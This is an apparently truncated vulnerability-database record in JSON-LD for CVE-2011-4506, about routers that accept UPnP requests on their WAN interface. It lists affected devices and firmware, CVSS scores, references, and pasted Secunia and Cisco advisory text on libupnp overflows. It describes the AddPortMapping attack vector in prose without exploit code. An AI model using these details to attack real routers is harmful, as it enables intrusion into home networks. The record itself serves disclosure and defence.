"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "tg585 router",
"scope": "lte",
"trust": 1.0,
"vendor": "technicolor",
"version": "7.4"
},
{
"model": "tg585 router",
"scope": "eq",
"trust": 1.0,
"vendor": "technicolor",
"version": "*"
},
{
"model": "br-6104k",
"scope": "eq",
"trust": 0.9,
"vendor": "edimax",
"version": "0"
},
{
"model": "6114wg",
"scope": "eq",
"trust": 0.9,
"vendor": "edimax",
"version": "0"
},
{
"model": "cn-wf514",
"scope": "eq",
"trust": 0.9,
"vendor": "canyon tech",
"version": "2.08"
},
{
"model": "cn-wf512",
"scope": "eq",
"trust": 0.9,
"vendor": "canyon tech",
"version": "1.83"
},
{
"model": "p-330w",
"scope": "eq",
"trust": 0.9,
"vendor": "zyxel",
"version": "0"
},
{
"model": "tg585 router",
"scope": "eq",
"trust": 0.9,
"vendor": "thomson",
"version": "0"
},
{
"model": null,
"scope": "eq",
"trust": 0.9,
"vendor": "speedtouch",
"version": "5x60"
},
{
"model": "wl-153",
"scope": "eq",
"trust": 0.9,
"vendor": "sitcom",
"version": "0"
},
{
"model": "wl-111",
"scope": "eq",
"trust": 0.9,
"vendor": "sitcom",
"version": "0"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "canyon tech",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "edimax computer",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "linksys a division of cisco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sitecom",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sweex",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "technicolor",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "zyxel",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "axis",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "fujitsu",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "huawei",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "linksys",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "nec",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "siemens",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sony",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "synology",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ipitomy",
"version": null
},
{
"model": "",
"scope": null,
"trust": 0.8,
"vendor": "multiple vendors",
"version": null
},
{
"model": "tg585",
"scope": "lt",
"trust": 0.8,
"vendor": "technicolor",
"version": "7.x"
},
{
"model": "tg585",
"scope": null,
"trust": 0.8,
"vendor": "technicolor",
"version": null
},
{
"model": "tg585",
"scope": "eq",
"trust": 0.8,
"vendor": "technicolor",
"version": "7.4.3.2"
},
{
"model": "wrt54g beta/2.0",
"scope": "eq",
"trust": 0.6,
"vendor": "linksys",
"version": "4.04.20.6/4.04.0.7/3.03.3.6/3.03.1.3/2.02.4.4/2.02.02.82.00.8"
},
{
"model": "tg585 router",
"scope": "eq",
"trust": 0.6,
"vendor": "technicolor",
"version": "7.4"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.20.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.0.7"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.3.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.1.3"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.4.4"
},
{
"model": "wrt54g beta",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.02.8"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.00.8"
},
{
"model": "tg585 router",
"scope": "ne",
"trust": 0.3,
"vendor": "thomson",
"version": "7.4.3.2"
},
{
"model": null,
"scope": "ne",
"trust": 0.3,
"vendor": "speedtouch",
"version": "5x66.2.29"
},
{
"model": "wl-153",
"scope": "ne",
"trust": 0.3,
"vendor": "sitcom",
"version": "1.39"
},
{
"model": "wrt54g",
"scope": "ne",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.01.0.6"
},
{
"model": "br-6104k",
"scope": "ne",
"trust": 0.3,
"vendor": "edimax",
"version": "3.25"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5064"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003036"
},
{
"db": "NVD",
"id": "CVE-2011-4506"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-368"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:technicolor:tg585_router_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "7.4",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:technicolor:tg585_router:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2011-4506"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Daniel Garcia",
"sources": [
{
"db": "BID",
"id": "50810"
}
],
"trust": 0.3
},
"cve": "CVE-2011-4506",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CARNEGIE MELLON",
"availabilityImpact": "COMPLETE",
"availabilityRequirement": "NOT DEFINED",
"baseScore": 9.4,
"collateralDamagePotential": "NOT DEFINED",
"confidentialityImpact": "NONE",
"confidentialityRequirement": "NOT DEFINED",
"enviromentalScore": 8.0,
"exploitability": "PROOF-OF-CONCEPT",
"exploitabilityScore": 10.0,
"id": "VU#357851",
"impactScore": 9.2,
"integrityImpact": "COMPLETE",
"integrityRequirement": "NOT DEFINED",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"remediationLevel": "WORKAROUND",
"reportConfidence": "CONFIRMED",
"severity": "HIGH",
"targetDistribution": "NOT DEFINED",
"trust": 0.8,
"userInterationRequired": null,
"vector_string": "AV:N/AC:L/Au:N/C:N/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2011-4506",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-52451",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2011-4506",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#357851",
"trust": 0.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201111-368",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-52451",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "VULHUB",
"id": "VHN-52451"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003036"
},
{
"db": "NVD",
"id": "CVE-2011-4506"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-368"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The UPnP IGD implementation on the Thomson (aka Technicolor) TG585 with firmware 7.x before 7.4.3.2 allows remote attackers to establish arbitrary port mappings by sending a UPnP AddPortMapping action in a SOAP request to the WAN interface, related to an \"external forwarding\" vulnerability. The Portable SDK for UPnP Devices libupnp library contains multiple buffer overflow vulnerabilities. Devices that use libupnp may also accept UPnP queries over the WAN interface, therefore exposing the vulnerabilities to the internet. Universal Plug and Play (UPnP) Multiple compatible routers have vulnerabilities with insufficient access restrictions. UPnP For supported routers, WAN Unintended from the side interface UPnP There is a vulnerability that allows the request to be accepted.An unauthenticated remote third party could obtain local network information or use the product as a proxy. Universal Plug and Play (UPnP) is a network protocol that is mostly used for personal computer device discovery and communication with other devices and the Internet. These requests can be used to connect to the internal host or proxy connection of the NAT firewall. Remote unauthenticated attackers can exploit vulnerabilities to scan internal hosts or communicate via the device proxy Internet. \nThe following devices are affected:\nCisco Linksys WRT54G firmware version prior to 4.30.5\nCisco Linksys WRT54GS v1 through v3 firmware versions prior to 4.71.1\nCisco Linksys WRT54GS v4 firmware versions prior to 1.06.1\nCisco Linksys WRT54GX firmware 2.00.05\nEdimax BR-6104K prior to 3.25\nEdimax 6114Wg\nCanyon-Tech CN-WF512 firmware version 1.83\nCanyon-Tech CN-WF514 firmware version 2.08\nSitecom WL-153 prior to firmware 1.39\nSitecom WL-111\nSweex LB000021 firmware version 3.15\nZyXEL P-330W\nSpeedTouch 5x6 firmware versions prior to 6.2.29\nThomson TG585 firmware versions prior to 7.4.3.2. A vulnerability exists in the UPnP IGD installation enablement in Thomson (also known as Technicolor) TG585 with firmware 7.x prior to firmware 7.4.3.2. This vulnerability is related to the \\\"external forwarding\\\" vulnerability. ----------------------------------------------------------------------\n\nThe final version of the CSI 6.0 has been released. \nFind out why this is not just another Patch Management solution: http://secunia.com/blog/325/\n\n----------------------------------------------------------------------\n\nTITLE:\nSiemens OZW / OZS Multiple Products libupnp Buffer Overflow\nVulnerabilities\n\nSECUNIA ADVISORY ID:\nSA52035\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/52035/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035\n\nRELEASE DATE:\n2013-01-31\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/52035/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/52035/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nMultiple vulnerabilities have been reported in multiple Siemens OZW\nand OZS products, which can be exploited by malicious people to\ncompromise a vulnerable device. \n\n1) Multiple vulnerabilities are caused due to a bundled version of\nlibupnp. \n\nFor more information:\nSA51949\n\n2) Multiple boundary errors within the \"unique_service_name()\"\nfunction (ssdp/ssdp_ctrlpt.c) in libupnp when handling SSDP requests\ncan be exploited to cause stack-based buffer overflows. The vendor is planning\nto provide fixes with upcoming firmware updates. \n\nPROVIDED AND/OR DISCOVERED BY:\n2) Rapid7\n\nORIGINAL ADVISORY:\nSiemens SSA-963338:\nhttp://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf\n\nRapid7:\nhttps://community.rapid7.com/docs/DOC-2150\nhttps://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. This library is used in several vendor network\ndevices in addition to media streaming and file sharing applications. \nThese vulnerabilities were disclosed on January 29th, 2013 in a CERT\nVulnerability Note, VU#922681, which can be viewed at:\n\nhttp://www.kb.cert.org/vuls/id/922681\n\nCisco is currently evaluating products for possible exposure to these\nvulnerabilities. This advisory is available at the following link:\n\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.11 (GNU/Linux)\n\niF4EAREIAAYFAlEIJZ8ACgkQUddfH3/BbTrUagD9FnKSVkc2iIfGs+7c8SVPT26+\nga5hYEz9UMUnitcqnbcBAIKe6KnkR6he2zbstVtbTKtqSjE7pfVb3lTKVZSeAkM5\n=6sTu\n-----END PGP SIGNATURE-----\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2011-4506"
},
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003036"
},
{
"db": "CNVD",
"id": "CNVD-2011-5064"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "VULHUB",
"id": "VHN-52451"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
}
],
"trust": 4.86
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#357851",
"trust": 5.8
},
{
"db": "NVD",
"id": "CVE-2011-4506",
"trust": 3.4
},
{
"db": "SIEMENS",
"id": "SSA-963338",
"trust": 0.9
},
{
"db": "CERT/CC",
"id": "VU#922681",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003036",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201111-368",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2011-5064",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "18224",
"trust": 0.6
},
{
"db": "BID",
"id": "50810",
"trust": 0.3
},
{
"db": "SECUNIA",
"id": "52035",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-52451",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "119949",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "119896",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5064"
},
{
"db": "VULHUB",
"id": "VHN-52451"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003036"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4506"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-368"
}
]
},
"id": "VAR-201111-0162",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5064"
},
{
"db": "VULHUB",
"id": "VHN-52451"
}
],
"trust": 1.4788191
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5064"
}
]
},
"last_update_date": "2023-12-18T12:09:30.242000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.technicolorbroadbandpartner.com/index.php"
},
{
"title": "Patch for Multiple Routers UPnP WAN Interface Remote Unauthorized Access Vulnerability (CNVD-2011-5064)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/6022"
},
{
"title": "thomson-download",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=41851"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5064"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003036"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-368"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-16",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-52451"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003036"
},
{
"db": "NVD",
"id": "CVE-2011-4506"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 4.4,
"url": "http://www.kb.cert.org/vuls/id/357851"
},
{
"trust": 2.5,
"url": "http://toor.do/defcon-19-garcia-upnp-mapping-wp.pdf"
},
{
"trust": 1.6,
"url": "http://homekb.cisco.com/cisco2/ukp.aspx?vw=1\u0026articleid=28341"
},
{
"trust": 1.6,
"url": "http://jvn.jp/cert/jvnvu357851"
},
{
"trust": 1.1,
"url": "http://www.upnp-hacks.org/devices.html"
},
{
"trust": 0.9,
"url": "https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play"
},
{
"trust": 0.9,
"url": "https://community.rapid7.com/docs/doc-2150"
},
{
"trust": 0.9,
"url": "http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf"
},
{
"trust": 0.8,
"url": "http://toor.do/upnp.html"
},
{
"trust": 0.8,
"url": "http://www.h-online.com/security/news/item/upnp-enabled-routers-allow-attacks-on-lans-1329727.html"
},
{
"trust": 0.8,
"url": "http://pupnp.sourceforge.net/"
},
{
"trust": 0.8,
"url": "https://community.rapid7.com/servlet/jiveservlet/download/2150-1-16596/securityflawsupnp.pdf"
},
{
"trust": 0.8,
"url": "http://www.rapid7.com/resources/free-security-software-downloads/universal-plug-and-play-jan-2013.jsp"
},
{
"trust": 0.8,
"url": "http://opentools.homeip.net/dev-tools-for-upnp"
},
{
"trust": 0.8,
"url": "http://upnp.sourceforge.net/"
},
{
"trust": 0.8,
"url": "http://www.dlink.com/us/en/technology/upnp"
},
{
"trust": 0.8,
"url": "http://jpn.nec.com/security-info/secinfo/nv13-003.html"
},
{
"trust": 0.8,
"url": "http://www.ipitomy.com/index.php/mi-security-notice-ip001"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4506"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-4506"
},
{
"trust": 0.6,
"url": "http://www.kb.cert.org/vuls/id/357851http"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/18224"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/52035/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/52035/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/blog/325/"
},
{
"trust": 0.1,
"url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20130129-upnp"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/922681"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5064"
},
{
"db": "VULHUB",
"id": "VHN-52451"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003036"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4506"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-368"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5064"
},
{
"db": "VULHUB",
"id": "VHN-52451"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003036"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4506"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-368"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-10-05T00:00:00",
"db": "CERT/CC",
"id": "VU#357851"
},
{
"date": "2013-01-29T00:00:00",
"db": "CERT/CC",
"id": "VU#922681"
},
{
"date": "2011-11-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-5064"
},
{
"date": "2011-11-22T00:00:00",
"db": "VULHUB",
"id": "VHN-52451"
},
{
"date": "2011-11-24T00:00:00",
"db": "BID",
"id": "50810"
},
{
"date": "2011-10-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"date": "2011-11-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-003036"
},
{
"date": "2013-01-31T07:26:31",
"db": "PACKETSTORM",
"id": "119949"
},
{
"date": "2013-01-30T02:46:44",
"db": "PACKETSTORM",
"id": "119896"
},
{
"date": "2011-11-22T11:55:06.137000",
"db": "NVD",
"id": "CVE-2011-4506"
},
{
"date": "2011-11-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201111-368"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-11-30T00:00:00",
"db": "CERT/CC",
"id": "VU#357851"
},
{
"date": "2014-07-30T00:00:00",
"db": "CERT/CC",
"id": "VU#922681"
},
{
"date": "2011-11-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-5064"
},
{
"date": "2012-03-08T00:00:00",
"db": "VULHUB",
"id": "VHN-52451"
},
{
"date": "2015-03-19T08:33:00",
"db": "BID",
"id": "50810"
},
{
"date": "2011-10-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"date": "2011-11-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-003036"
},
{
"date": "2012-03-08T05:00:00",
"db": "NVD",
"id": "CVE-2011-4506"
},
{
"date": "2011-11-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201111-368"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201111-368"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "UPnP requests accepted over router WAN interfaces",
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "configuration error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201111-368"
}
],
"trust": 0.6
}
}
VAR-201111-0161
